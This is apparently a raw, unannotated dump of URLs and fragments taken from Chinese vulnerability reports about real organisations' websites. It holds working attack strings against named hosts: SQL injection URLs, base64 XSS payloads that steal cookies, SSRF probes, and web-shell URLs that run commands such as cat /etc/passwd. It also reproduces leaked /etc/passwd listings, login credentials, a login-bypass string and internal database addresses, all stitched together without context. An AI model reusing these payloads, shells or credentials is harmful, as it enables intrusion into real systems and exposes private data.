http://**.**.**.**:7001/tian/wooyun.jsp http://**.**.** http://www.gykgah.com/yyoa/ http://www.gykgah.com/yyoa/assess/js/initDataAssess.jsp http://**.**.**.**/product_list.php?i=1 http://ms.hujiang.com/api/ajaxDataHandler.ashx?callback=jsonp1&cateId=1&grade=0&lang=en&op=GetProgramCenterList&order=1&page=1&pageSize=10&searchKey=&t=0.4603204862214625&userID=0 http://ms.hujiang.com/api/ajaxDataHandler.ashx?callback=jsonp1&cateId=1&grade=0&lang=en*&op=GetProgramCenterList&order=1&page=1&pageSize=10&searchKey=&t=0.4603204862214625&userID=0 http://vip.wissun.com https://pmos.md.sgcc.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://baidu.com&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://qcdds.dongfeng-nissan.com/Data/DataUpLoad.aspx http://mindiao.cjn.cn:80/ http://**.**.**.**/aicuqcs/common/loginCheck_domain.jsp http://**.**.**.**/aicuqcs/common/ Format:Systime http://**.**.**.**/ http://www.jikexueyuan.com/course/ask?course_id=78&seq=1&page=1&per_page=50 http://www.jikexueyuan.com/course/ask?course_id=205&seq=1&page=1&per_page=100 http://www.fj.sgcc.com.cn/ https://222.185.235.2/ http://**.**.**.**:7008 http://**.**.**.**:7008 http://**.**.**.**:7070 http://enwcm.haier.com/ http://enwcm.haier.com/wcm/services/trswcm:SOAPService http://enwcm.haier.com/wcm/services/trswcm:SOAPService SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/ xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/ xmlns:xsd="http://www.w3.org/1999/XMLSchema xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance xmlns:m0="http://tempuri.org/ xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/ xmlns:urn="http://wcm.xasw.gov.cn/wcm/services/trswcm:SOAPService SOAP-ENV:Header/ SOAP-ENV:Body SOAP-ENV:Body SOAP-ENV:Envelope http://**.**.**.**/joomla/administrator/ http://**.**.**.**/joomla/administrator/language/en-GB/en-GB.xml http://**.**.**.**/exploiting-cve-2015-8562-new-joomla-rce-2/ http://sto.cn/admin11ww/zp.asp http://210.73.208.213:8080/login http://**.**.**.**/balist.cgi?page=23&Key= http://**.**.**.**:8080/cxxt/unit/loginunit.jsp http://202.104.30.160/ http://202.104.30.214:80/ http://202.104.30.248:80 http://202.104.30.248/uddiexplorer/she11.jsp?o=vLogin http://172.16.16.23 http://172.16.16.20 http://172.16.16.19 http://172.16.16.21 http://172.16.16.29 http://**.**.**.**/yeNewsInfo.asp?id=133 http://**.**.**.**/ http://**.**.**.**:7001/she11.jsp?o=vLogin http://westsecu.21tb.com/login/login.logout.do http://support.daw.so/admin.php http://yingxiong.com/ http://support.daw.so/admin.php http://106.37.209.144/zlms/portal/sp/login.php http://106.37.209.144/zlms/portal/sp/login.php http://sqlmap.org http://116.236.239.108:7001/chinalife-web/Plan.xml http://116.236.239.108:7001/chinalife-web/she11.jsp?o=vLogin http://222.73.63.136/live_admin/application/singerShow/view/index.html root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin chanjet:x:500:500::/home/chanjet:/bin/bash cjzf_jjdz:x:501:501::/home/cjzf_jjdz:/bin/bash dz_citic:x:502:502::/home/cjzf_jjdz/dz_citic:/bin/bash dz_bosera:x:503:503::/home/cjzf_jjdz/dz_bosera:/bin/bash http://o.kekenet.com/kekecms/admin/index.php/home.d_hit?id=20607&catid=1414 http://spcw.sinopharm.com/ http://oa.cnpic.com.cn/seeyon/index.jsp http://oa.cnpic.com.cn/seeyon/logs/login.log,发现无内容,但是可以bypass http://oa.cnpic.com.cn/seeyon//logs/login.log http://180.153.16.119:8180 http://180.153.16.119:8180/jmx-console https://meican.com/account/mobilelogin?mobileNumber= http://**.**.**.**:7001/ http://h5.anhuinews.com/index.php?a=view&c=scene&id=1&time=1451430169690 http://iss.digitalchina.com:8080/login.action http://client.cmge.com/admin/ http://old.uimaker.com/designer.php?zy=1 http://**.**.**.**/ http://**.**.**.**/2.jsp http://dag.cqupt.edu.cn:7001/PDE_PORTAL_V1.0.1/login.jsp cn:7001 http://**.**.**.**/admissions/news_detail.php?sid=5008&p_no=748 http://css.hisense.com/HXCSS/ http://59.41.46.167:8122 http://**.**.**.**/wa/wa/ma3.jsp https://180.169.5.227/ipp-payment-app/index.do?id=com.allinpay.cpg.IPaymentSaleService https://180.169.5.227/wooyun/wpp1.jsp http://**.**.**.**/chaxun.aspx?key=1 http://**.**.**.**/jianche.aspx?key=%27&page3=9643 http://**.**.**.**/news_1.php?p_no=396 http://**.**.**.**/ http://**.**.**.**/games_detail.php?cid=68 http://imgcache.qq.com/qqshow_v3/htdocs/live/yaohe/jumppage.html?url=data:text/html%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg== http://qz6666.com/1.html http://**.**.**.**/phpinfo.php/RK=0/RS=UyMNB5OeaW http://**.**.**.**/ccsh2010/index.php?menu=510&E1inc=12849&pageID1=1 http://mail.scdc.com.cn:3000 http://**.**.**.**/en/service21_details.php?id=39 http://**.**.**.**/table.php?m=03&y=2014 http://180.169.5.248/feedBackIssus/index https://mailsh.tct.tcl.com http://**.**.**.**/GuanLi/denglu.aspx https://101.200.31.23/user-login-Lw==.html https://182.92.26.65/user-login-Lw==.html http://202.96.191.219/tk/tx.jsp http://www.scrcoa.com http://www.dpartner.com.cn:8080/ http://www.buchang.com/zbt1jl/Admin/index.aspx http://www.buchang.com/zbt1jl/ http://**.**.**.**/ http://**.**.**.**/live_goodnews_new.htm http://**.**.**.**/search.php house.e23.cn/lp/pic_more.asp?contentid=2784&type=huxing* http://**.**.**.**:8002/SFP_ShareManage/ShareManagement http://www.1haolian.com/yhlnew/NewInfos.aspx?id=2617 http://www.1haolian.com/yhlnew/AppliancesDataAnalysis.aspx?type=ya&doctype=1&owntype=1 http://tvgo.1haolian.com/etvshop/ICanSupplyinfoManage.aspx?key=88952634&page=1 http://tvgo.1haolian.com/app/news/index.aspx?q=info&list=list&kwd= http://www.ihxlife.com/ http://**.**.**.**/wdxy/ http://**.**.**.**/PortalConsole/login.do http://**.**.**.**/PortalConsole/pages/UiasUser/findmypwd.do http://**.**.**.**:80/PortalConsole/pages/UiasUser/findpwdaction.do http://**.**.**.**/love000/mylist.asp https://store.b.qq.com/my/orders http://101.227.240.110:8989/baf/jsp/uiframe/login.jsp这里随便输入一个帐号lili/888888,可以登陆成功,跳入修改密码界面,原始数据包: http://101.227.240.110:8989/wooyun.jsp http://116.228.55.80:8103/ http://116.228.55.80:8080/ http://**.**.**.** http://mail.faw.com.cn/ http://supplier.sinopec.com:9001 lp:/bin/false invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd ipsec:/usr/bin/ksh user:/var/spool/uucppublic:/usr/sbin/uucp/uucico pconsole:/usr/bin/ksh esa:/usr/bin/ksh supftp:/usr/bin/bsh http://**.**.**.** http://**.**.**.**:8080 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh admin:admin http://**.**.**.**/**.**.**.**.rar http://**.**.**.**/ http://**.**.**.**/content.php?view_group=1&view_type=165&view_mode=all http://**.**.**.**/content.php?id=269503 http://**.**.**.**/promotion.php?id=54621 http://**.**.**.**/magazine.php?id=50880 http://**.**.**.**/epaper_po.php?id=936 http://**.**.**.**/ccm_content.php?id=19066 http://**.**.**.**/classic_content.php?id=33456 http://**.**.**.**/radio.php?id=254373 http://**.**.**.**/forum.php?change_model=forum_list&id=1 https://**.**.**.**:7021 http://**.**.**.**/ http://**.**.**.**/download_1_Corinthians.php http://**.**.**.**/downloadfile.php?file=./download/1_Corinthians/1_Corinthians01-01.mp3 http://**.**.**.**/downloadfile.php?file=xxxxx root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:498:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin pulse:x:497:496:PulseAudio Daemon:/var/run/pulse:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin mysql:x:500:500::/home/mysql:/bin/bash maintain:x:501:501::/home/maintain:/bin/bash reg:x:502:502::/home/reg:/bin/bash goodnews909:x:503:503::/home/goodnews909:/bin/bash dovecot:x:97:97:Dovecot server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:496:493:Dovecot's user:/usr/libexec/dovecot:/sbin/nologin cyberoam:x:504:504::/home/cyberoam:/bin/bash cyberoam9:x:505:505::/home/cyberoam9:/bin/bash victor:x:506:506::/home/victor:/bin/bash phoebe:x:507:507::/home/phoebe:/bin/bash lionel:x:508:508::/home/lionel:/bin/bash service:x:509:509::/home/service:/bin/bash angel:x:510:510::/home/angel:/bin/bash monica:x:511:511::/home/monica:/bin/bash butyliu:x:512:512::/home/butyliu:/bin/bash linsenity514:x:513:513::/home/linsenity514:/bin/bash amyai:x:514:514::/home/amyai:/bin/bash watson:x:515:515::/home/watson:/bin/bash teresa:x:516:516::/home/teresa:/bin/bash sickfoot:x:517:517::/home/sickfoot:/bin/bash daisylau:x:518:518::/home/daisylau:/bin/bash karen:x:519:519::/home/karen:/bin/bash nancylee0618:x:520:520::/home/nancylee0618:/bin/bash mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin admin:x:521:521::/home/admin:/bin/bash garytung:x:522:522::/home/garytung:/bin/bash http://**.**.**.** http://**.**.**.**/news_detail.asp?cat=52&sn=229 http://**.**.**.**/bugs/wooyun-2015-0136308提及的注入点http://**.**.**.**/news_detail.asp?cat=52&sn=229不是一个点 http://**.**.**.**/in http://**.**.**.**/web.rar http://www.chinanetwork.com.cn/w8/Event/GetOne?eventid=-1 http://**.**.**.**/ http://**.**.**.**/xtjp/login.do http://**.**.**.**/MyAgent/showcustom/view/common.action http://**.**.**.**/MyAgent/bak.jsp http://m.funguide.com.cn http://fcdt.800j.com.cn/index.php?m=content&c=index&a=typelist&catid=87&type=71|news|list&titlename=要闻观察 http://**.**.**.**/ http://**.**.**.**/about.aspx?cid=1 http://**.**.**.**/images/cssroot.jsp http://gxb.bnu.edu.cn/Index.php/Notice/shownot?nid=-37%20%20union%20select%201,user%28%29,database%28%29,4 http://oa.cnbg.com.cn/seeyon/ http://oa.cnbg.com.cn/seeyon//logs/login.log。需要通过两个斜杠//来绕过。 http://oa.cnmb.com.cn/seeyon/main.do http://www.melinked.com/requirement/14481950288762881.html https://**.**.**.**/login.action http://test2.suzhou.daojia.com.cn/combo_list.php?a=2 http://house.e23.cn/lp/list.asp?address=3137%20Laguna%20Street&diqu=1&image=&shangquan=&xuequ= http://a6.gykghn.com:8080/yyoa/ http://a6.gykghn.com:8080/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids= http://a6.gykghn.com:8080/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp http://**.**.**.**/cas/login?service=http://**.**.**.**/main/login.html http://**.**.**.**:8082/secure/Dashboard.jspa http://**.**.**.**:8082/secure/Signup!default.jspa http://**.**.**.**/daikuan/gjjcx.asp http://oa.sino-tcm.com/yyoa/index.jsp http://oa.sino-tcm.com/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://**.**.**.**:80/plan.do?method=getexpert&type=expert http://**.**.**.**/chemlab/App/ViewArticle.asp?ID=5176&CHID=38 http://222.73.243.130:9000/is/cmd.jsp?pwd=023&cmd=ifconfig http://wooyun.org/bugs/wooyun-2015-161842 http://**.**.**.**/site/product_classify/tyu/index.php?Product_Site_Classify_SN=47592&PHPSESSID=kujfceu4vc04oto2d9rr1ns8r7&Company_SN=17741 http://**.**.**.**/site/product_classify/tyu/index.php?Product_Site_Classify_SN=475921%20and%20updatexml%281,concat%280x7e,user%28%29%29,1%29&PHPSESSID=kujfceu4vc04oto2d9rr1ns8r7&Company_SN=17741 http://**.**.**.**/Default.aspx?course=yangqs&wno=1 http://**.**.**.**/eventcenter.php?tblname=news&id=71 http://**.**.**.**/articlelist.php?catid=1 http://**.**.**.**/zuoye/zuoye1303/login.asp http://oa.uc56.com http://oa.uc56.com/ucoa/sdkform/caigou/cgviewbill.aspx?workid=46295&fk_flow=180 http://oa.uc56.com/ucoa/sdkform/comm/flowfile.aspx?fk_flow=096&fk_node=9611&fid=0&workid=23527 http://oa.uc56.com/ucoa/sdkform/gongcheng/gclx_bill.aspx?workid=43851&fk_flow=186 http://oa.uc56.com/UCOA/WF/WorkOpt/OneWork/CH.aspx?FK_Node=&WorkID=54383&FK_Flow=123 http://oa.uc56.com/ucoa/sdkform/shenqing/sq_form.aspx?workid=41299&fk_flow=024 http://oa.uc56.com/UCOA/SDKForm/ShenQing/SQ_Form.aspx?WorkID=44769&FK_Flow=024 http://oa.uc56.com/UCOA/SDKForm/BaoXiao/ViewBill.aspx?WorkID=5891&FK_Flow=020 http://oa.uc56.com/ucoa/sdkform/caigou/cgviewbill.aspx?workid=46295&fk_flow=180 http://oa.uc56.com/ucoa/sdkform/gongcheng/gclx_bill.aspx?workid=43851&fk_flow=186 http://oa.uc56.com/ucoa/sdkform/shenqing/sq_form.aspx?workid=41299&fk_flow=024 http://oa.uc56.com/ucoa/sdkform/shenqing/sq_form.aspx?workid=26899&fk_flow=024 http://cms.php.administrator.cctvmall.com/ http://**.**.**.**/general/vmeet/upload/temp/fjhh.php http://wx.sto.cn/Ali/index.php?s=/home/Main/to_editAddress/id/301/type/0 http://wx.sto.cn/Ali/index.php?s=/home/Main/to_editAddress/id/250001/type/0 http://wx.sto.cn/Ali/index.php?s=/home/Main/to_editAddress/id/250003/type/0 http://wx.sto.cn/Ali/index.php?s=/home/Main/to_editAddress/id/250004/type/0 http://202.98.11.126:85/login.jsp http://202.98.11.126:85/login.jsp http://202.98.11.126:80/login.jsp http://wooyun.org/bugs/wooyun-2010-0166177 http://113.106.76.91/ http://113.106.76.91/she11.jsp http://10.9.33.19 http://10.9.33.80 http://10.9.33.73 http://10.9.33.32 http://10.9.33.100 http://10.9.33.87 http://10.9.33.101 http://10.9.33.102 http://10.9.33.96 http://**.**.**.**/admin user:gongan006 pass:22048988 http://**.**.**.**/pro/list.php?cid=63 http://**.**.**.** http://**.**.**.**/news.php?id=44&mode=news_view http://**.**.**.**/schedule.php?mode=schedule_list&type=1 http://**.**.**.**/order.php?id=20&mode=order_post http://**.**.**.**/search.php?mode=search_list&keyword=2015&type=1&submit.x=10&submit.y=21 http://**.**.**.**/event.php?id=&mode=event_view http://**.**.**.**/program.php?mode=program_list&type=5 http://**.**.**.**/program.php?id=373&mode=program_view http://**.**.**.**/blog/hans58351238/blog.php?id=23&mode=blog_view http://**.**.**.**/xiaoxuntong/ http://dm.72dns.com http://survey.wacom.com.cn/ pay.cmseasy.cn/0.rar http://58.56.60.68:8088/yyoa/checkWaitdo.jsp?userID=1 http://www.gk-nn.com/loadClickCount.ashx?NewsId=1 http://video.e23.cn/shipin/zt.shtm?ftzt=1&p=2 http://imo.cheyipai.com/Customize/Audit/MessageMonitor/groupSearch.php?id=35651&startTime=2015-12-01 http://imo.cheyipai.com/Customize/Audit/auditreport/Qgrouplist.php http://121.14.65.120:8080/cmd.jsp?pwd=023&cmd=ls%20-l http://121.14.65.120:8080/cmd.jsp?pwd=023&cmd=cat%20/etc/passwd http://imo.iflytek.com//Customize/Audit/auditreport/Qgrouplist.php http://**.**.**.**/search/index.do http://ysadmin.yszjdx.com/ http://m.chinaxinge.com/android/gsview.asp?id=2775518 http://m.chinaxinge.com http://www.ems.com.cn/uddiexplorer/SetupUDDIExplorer.jsp http://www.ems.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.3.11.20:80&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://shipping.ems.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://agent.ems.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://**.**.**.** http://wooyun.org/bugs/wooyun-2010-0165622 http://haoce.ztgame.com/view/user.html http://zhichi.ztgame.com:9000/login.html realauto.testin.cn/report.actionop=Overview.index&adaptId=e377ddfc1f47380fb59b876354932c41_ www.umeng.com/apps/f6280093a75c89df7c240045/reportsticket=ST-1409719124rdPYEek4GRdO9XwFPiZ_ www.jpush.cn/_ http://**.**.**/Project/ProjectInfo/20558_ http://www.zealer.com/data/cameraAnalysis?id= http://www.zealer.com/data/cameraSample?id= http://rdm.mobile.youku.com/signin/ http://202.98.11.47:7001/ http://10.44.30.89 http://10.44.30.35 http://10.44.30.52 http://10.44.30.91 http://10.44.30.51 http://10.44.30.113 http://10.44.30.118 http://10.44.30.54 http://10.44.30.90 http://10.44.30.128 http://10.44.30.79 http://10.44.30.156 http://10.44.30.76 http://10.44.30.70 http://10.44.30.213 http://202.98.11.47:7001/uddiexplorer/jmxroot.jsp jdbc:oracle:thin:@10.44.31.36:1521/orcl http://**.**.**.**/contact/ http://122.225.53.6 http://**.**.**.**/szdwxs2.asp?id=81 http://webapp.cbs.baidu.com/rsstopic/gate?cbsonline=7&p=t&brand=top&rssadv=1&src=news.sina.cn/share.d.html?docID=fxmxxsp7274806#comment-hot-container http://webapp.cbs.baidu.com/rsstopic/gate?cbsonline=7&p=t&brand=top&rssadv=1&src=127.0.0.1:80 http://wooyun.org/bugs/wooyun-2010-0145236 http://mes.juneyaoair.com/mes/ http://a.paytend.com/admin/ http://**.**.**.** http://**.**.**.**/aksale/user/land.xhtml?username=D5C5CEC4B1A6 http://kf.bendibao.com/bus/zzcx.aspx?searchtype=fast&searchtype2=0&station1=1&station2=B http://**.**.**.**/ http://service.made-in-china.com:80/ http://service.made-in-china.com/service/successful-story-1.html http://life.scu.edu.cn/webContent.asp?id=1223&type=news http://**.**.**.**/Services/system/index.asp http://219.143.213.46:7002/bea_wls_internal/she11.jsp?o=index jdbc:oracle:thin:@10.1.126.78:1521:wmdb http://spam.vipabc.com/snspam/homepage.asp http://120.35.11.139:82 http://**.**.**.**/manage/Login.aspx http://**.**.**.** http://open.t.qq.com/open-js/doc/snippet/code/callback.html?return_to=data:text/html;base64,MTExMTExMTE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=&appkey=x#1 http://qz6666.com/2.html mat1.gtimg.com/app/openjs/openjs.js#autoboot=no&debug=yes http://my.bendibao.com/map/api.php?action=geturl&s1=e&s2=e http://**.**.**.**/cn/minipage/CorBankDemo/AdminWeb/main/crm/operatorManage/Add/index.html http://125.93.53.81/manager/html?org.apache.catalina.filters.CSRF_NONCE=EB06D451164A29D32E37E008F30E8BCE http://shop.100msh.com/search/ajax_get_partner_info?partner_ids_str=1 http://**.**.**/portal/ http://www.youxinpai.com/contactus_us/ http://**.**.**.** https://**.**.**.**/spp-cpp-web/cpp/aboutUs.action https://**.**.**.**/spp-cpp-web/bak.jsp http://**.**.**.**/newsdetailhtml.php?data_no=1637 http://**.**.**.**/ http://**.**.**.** http://chat.meilele.com/solr/#/ http://**.**.**/admin/test.jsp密码123_ http://**.**.**.** http://ehr.tsingtao.com.cn:7001/ehr/login.do http://report2015.xiaojukeji.com/report?phone=18888888888 http://multimedia.ecnu.edu.cn/ http://testcmbc.58v5.cn/manager/ http://bangzhu.feidee.com/ http://www.scyd360.com/help.php?mod=list&cateid=4 http://**.**.**.**/crcshopweb/web/content_page.php?lang=2&id=7 http://www.csimc.com.cn/ http://a8.csimc.com.cn/seeyon//logs/login.log http://202.115.194.53:2222/?CardType=CampusExamCard&examID=1439&examCode=2014110308 http://**.**.**.**/szxq.rar http://fx.cmge.com/admin/ http://www.easemob.com/.git/index http://ttx5.yingxiong.com/m/list.html?cid=* site:tangscan.com http://tangscan.com/auth/p8SY0%252B8RdM3f8BvcwAIbsoEnFRi75%252BY%252Feq6tfDCeIoOpPKu38prY http://tangscan.com/auth/p8SY1OgWdM%2FUph3fwAIa5IclFh%2B75bdnJ%2Fn7LWvJJN%2F5OPvmpJna http://www.tangscan.com/auth/p8Gb1OoWdMOJ80eIxwRKsoMjRhntueVmIKGscGmZcoL6Pa7k9cmI http://a6.gykghn.com:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@datadir http://**.**.**.**/do_with/wcm/dzhd/dzhd.jsp?shijian=&shouzhong=&leixing=&didian=63*&xilie=&zhujiang= http://tte.whut.edu.cn/admin/show.php?dno=65 http://tte.whut.edu.cn/admin/show.php?dno=65 http://www.dfcv.com.cn/ModelPages/MarketActivity/MarketActivity.aspx?ColumnCode=HD20141204001 http://**.**.**.**/ index.php/welcome/login http://www.flyertea.com/live.php http://**.**.**.**/ http://m.flyertrip.com/Admin/orders/all http://estore.wacom.com.cn/userCenter/ReceiveAddress.aspx http://www.chunbo.com/helpcenter/index/content_id/56 http://www.dfcv.com.cn/ModelPages/MarketActivity/MAPhotoDetail.aspx?ColumnCode=HD20141204001&id=61 http://116.236.252.101:20021/ http://116.236.252.101:20021/zecmd/zecmd.jsp http://116.236.252.101:20142/scheduler/displaTasks.do?method=displayTasks http://116.236.252.101:20022/zecmd/zecmd.jsp username:admin'or'1'='1 pwd:123456 http://www.tangscan.com/corp.php?action=detail&id=******&auth=a17a2************bb70e&uid=***&taskid=****&page= http://www.tangscan.com/corp.php?action=detail&id=*****&auth=a17a27a4**********70e&uid=***&taskid=****&page= http://www.tangscan.com/corp.php?action=detail&id=*****&auth=a17a27a**********70e&uid=***&taskid=***&page= https://**.**.**.**/liyongqiang/macrowing_crm/blob/master/Source/EDoc2.Crm.Website/Web.config http://**.**.**.**/ http://**.**.**.**/dwr/call/plaincall/UserValidate.isNameExist.dwr http://**.**.**.** http://**.**.**.**/bugs/wooyun-2010-025854 http://**.**.**.**/bbs_detail.asp?id=197 http://**.**.**.**/bbs_detail.asp?id=197 http://**.**.**.**/bbs_detail.asp?id=197 https://111.205.122.237:444/ http://**.**.**.**/message/messageManager/notion_list.jsp?topic_id=144470785089234606130176714333 http://**.**.**.**:7001/logonAction.do http://**.**.**.**/previous_mis/script/bored/list.asp?hnumber=255 http://css.hisense.com/HXCSS/ http://uatcap.ouyeelf.com/cap-admin/login;jsessionid=B984C694E98DBC59546DFF76DF9C10BE http://uatcap.ouyeelf.com/jmx-console/ http://uatcap.ouyeelf.com/web-console http://uatcap.ouyeelf.com/invoker/JMXInvokerServlet http://oa.hupu.com:88/seeyon/ http://**.**.**.**/ajax/ku25_game_login.php?password=1111&username=111*&fromurl=http http://202.98.11.167:7001/ http://202.98.11.167:7001/uddiexplorer/she11.jsp?o=vLogin jdbc:oracle:thin:@10.7.0.115:1521:qmvrr http://eb.e-bridge.com.cn/newebridge/default.jsp http://**.**.**.** http://**.**.**.**/www.zip http://222.92.248.134:88/manage/login http://a8.csimc.com.cn/seeyon/management/index.jsp http://a8.csimc.com.cn/seeyon/logs/login.log http://csair.bluedoor.com.cn:80/ http://scication.swu.edu.cn/article.php?aid=5075&rid=4 http://swjsxyold.swu.edu.cn/show/show.php?id=2044 http://icc.swu.edu.cn/wzxs.php?zdwz=930&cz=xs http://**.**.**.**/UnifiedPublicServicePlatform/navigation.action?to=home_info_techschoolgradcert http://rsc.nenu.edu.cn/news.php?nid=1322 http://dc.nenu.edu.cn/trend2.php?id=79 http://xsc.nenu.edu.cn/show_news.php?id=415 http://www.library.nenu.edu.cn/DataBase/DataBase_List.aspx?type=B http://**.**.**.**:7001/defaultroot/Logon!logon.action t3://localhost:7001 t3://localhost:7001 http://**.**.**/wh/ user:wangmei pwd:wooyun123 https://**.**.**.**/fidel1216/zhihe/blob/492c935db7b87dab108308cd65a6ac9f73508562/Home/Conf/config.php http://api.weibo.com/webim/2/direct_messages/contacts.json?source=209678993&count=200&add_virtual_user=5,&is_include_group=0&callback=STK_14511436516391 http://119.90.35.101 http://119.90.35.101/users/ http://119.90.35.101/users/Show.aspx http://119.90.35.101/file/ http://119.90.35.101/users/1.aspx http://119.90.35.101/users/Import.aspx encap:Ethernet D8:D3:85:B3:B5:04 dad3:85ff:feb3:b504/64 Scope:Link MTU:1500 packets:628800950 packets:706584025 txqueuelen:1000 https://**.**.**.**/hualiang0537/hlbase/blob/be0cdd552f9d094b2cfabf88db3a24c30ce22e3b/hlbase/src/main/resources/config.properties http://oa.haiboinvest.com/Login.aspx http://180.153.244.156/.svn/entries http://222.73.63.130:7788/.svn/entries http://222.73.63.130:8080/ http://222.73.63.131/ http://222.73.63.131/jhqd/CodeCount.pl http://222.73.63.131/jhqd/ServerCount http://222.73.63.131/jhqd/config.xml http://222.73.63.131/jhqd/ssh_menu http://222.73.63.161 http://222.73.63.133/t.php http://222.73.63.161/phpinfo.php http://222.73.63.161:8080/phpinfo.php http://222.73.63.254/t.php http://app1.chinadaily.com.cn/appdesk/vote/surveypre.shtml http://huawei-microfilm.iqiyi.com/index.php?s=/Home/Index/getPosters/type/poster_type/poster_type/0/page/1 http://wanwan.sina.com.cn/event/sssanguo_2/sg.php http://x.com/test.html?http://wanwan.sina.com.cn/event/sssanguo_2/sg.php http://wanwan.sina.com.cn/event/sssanguo_2/fun.php http://d.72dns.com http://reg.chexun.com/API/PHPUCLogin.ashx?UserName= http://opinion.e23.cn http://**.**.**.**/login.aspx(某科院的网站) http://oa.58ganji.com/ https://sslvpn.ganji.com/,DanaInfo=qudao.corp.ganji.com+ https://sslvpn.ganji.com/reject/,DanaInfo=asman.corp.ganji.com+page https://sslvpn.ganji.com/v5/,DanaInfo=audit.corp.ganji.com+ https://sslvpn.ganji.com/v5/HouseComment/,DanaInfo=audit.corp.ganji.com+Auditlist.aspx https://sslvpn.ganji.com/v5/editor/,DanaInfo=audit.corp.ganji.com+AuditPostInfo.aspx?EditorId=123874&BeinDate=2015-12-01&EndDate=2015-12-31&type=0 